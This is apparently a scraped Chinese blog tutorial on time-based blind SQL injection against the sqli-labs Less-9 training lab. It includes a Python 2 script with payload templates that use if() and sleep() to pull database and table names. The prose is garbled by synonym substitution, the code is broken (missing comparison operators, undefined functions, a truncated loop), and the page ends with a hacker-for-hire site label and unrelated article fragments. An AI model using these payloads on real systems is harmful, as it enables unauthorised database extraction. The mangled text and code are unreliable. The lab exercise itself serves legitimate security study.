建立环境:xp sp3虚拟机+xampp
运用东西:firefox浏览器+hackbar插件+tamper data插件+Cookie Editor插件
第九课:GET – Blind – Time based – Single Quotes(依据时刻-单引号-盲注)
这一课咱们发现,加不加单引号页面回来的信息都是相同的。
看一下代码。公然,不管输入是什么,回来的成果都是相同的。这儿就要运用依据时刻的盲注办法了。
在mysql中if(condition,A,B)表明当condition为true时,回来;当condition为false时,回来B。因而咱们能够结构下面的查询。假如数据库名的之一个字母ascii值大于120,则当即回来成果;不然10秒之后才回来成果。
咱们当然能够这样手艺猜解数据库名,表名,列名……也能够自己编写脚原本完结。经过sqli-labs学习sql注入——根底应战之less1-10这篇博客中给出了第八课的python脚本,我稍稍修改了一下来完结第九课。
#-*-coding:utf-8-*-
"""
@version:
@author: giantbranch
@file: blindsqlinjection.py
@time: 2019/5/1
"""
import time
import urllib
import urllib2
index = "0"
getTable = "users"
url = "http://192.168.153.129/sqli-labs/Less-9/?id=1"
database = "database()"
selectDB = "(select database())"
selectTable = "(select table_name from information_schema.tables where table_schema='%s' limit %d,1)"
asciiPayload = "' and if(ascii(substr(%s,%d,1))>=%d,0,sleep(0.1)) #"
lengthPayload = "' and if(length(%s)>=%d,0,sleep(0.1)) #"
selectTableCountPayload = "' and if((select count(table_name) from information_schema.tables where table_schema='%s')>=%d,0,sleep(0.1)) #"
selectTableNameLengthPayloadfront = "'and if((select length(table_name) from information_schema.tables where table_schema='%s' limit "
selectTableNameLengthPayloadbehind = ",1)>=%d,0,sleep(0.1)) #"
#发送恳求,依据页面的回来时刻的判别长度的猜想成果
#string:猜想的字符串;payload:运用的payload;length:猜想的长度
def getLengthResult(payload, string, length):
print payload % (string, length)
finalUrl = url + urllib.quote(payload % (string, length))
s1=time.time()
res = urllib2.urlopen(finalUrl)
s2=time.time()
if s2-s1 0.08:
return True
else:
return False
#发送恳求,依据页面的回来时刻的判别字符的猜想成果
#payload:运用的payload;string:猜想的字符串;pos:猜想字符串的方位;ascii:猜想的ascii
def getResult(payload, string, pos, ascii):
finalUrl = url + urllib.quote(payload % (string, pos, ascii))
s1 = time.time()
res = urllib2.urlopen(finalUrl)
s2 = time.time()
if s2 - s1 0.08:
return True
else:
return False
#注入
def inject():
#猜数据库长度
lengthOfDBName = getLengthOfString(lengthPayload, database)
print "length of DBname: " + str(lengthOfDBName)
#猜数据库称号
DBname = getName(asciiPayload, selectDB, lengthOfDBName)
print "current database:" + DBname
#猜数据库中的表的个数
tableCount = getLengthOfString(selectTableCountPayload, DBname)
print "count of table:" + str(tableCount)
for i in xrange(0, tableCount):
num = str(i)
#猜当时表的长度
selectTableNameLengthPayload = selectTableNameLengthPayloadfront + num + selectTableNameLengthPayloadbehind
tableNameLength = getLengthOfString(selectTableNameLengthPayload, DBname)
[1] [2] [3] [4] [5] [6] [7] 黑客接单网
通过访问策略控制禁止 /_async/* 路径的URL访问Windows 7https://support.microsoft.com/zh-cn/help/4500705/customer-guid...
提权GETSHELL 发现到挺有意思的是个内网,是个典型内网服务做了端口路由映射公网。 看起来安全做的很巨大尚。 “麦芽地”传达源虽告一段落,但百度云ekangwen206用户共享的247个文件中悉数...
其实,咱们日常打电话也是这种的对话形式,剖析对方的志愿进行后续的评论。 反映在上面的脚本中,便是听懂对方说了些什么,然后依据剧本上预设脚本匹配,将匹配到的句子“播映”给接听打扰电话的人。 这样,循序往...
除了Win8、Win 10之外,几乎所有的Windows版本都受到这个漏洞的影响。 尽管微软已经停止了对Windows 2003和Windows XP的支持,但由于这次漏洞危害程度较高,微软此次修复补...
开始的版别,办法和字符串均未加密。 JNDI - Java Naming and Directory Interface 名为 Java命名和目录接口,详细的概念仍是比较复杂难明,详细结构设计细节可以...
if ;then近日,Spring官方团队在最新的安全更新中披露了一则SpringCloud Config目录遍历漏洞(CVE-2019-3799)。 漏洞官方定级为High,属于高危漏洞。 该漏洞本...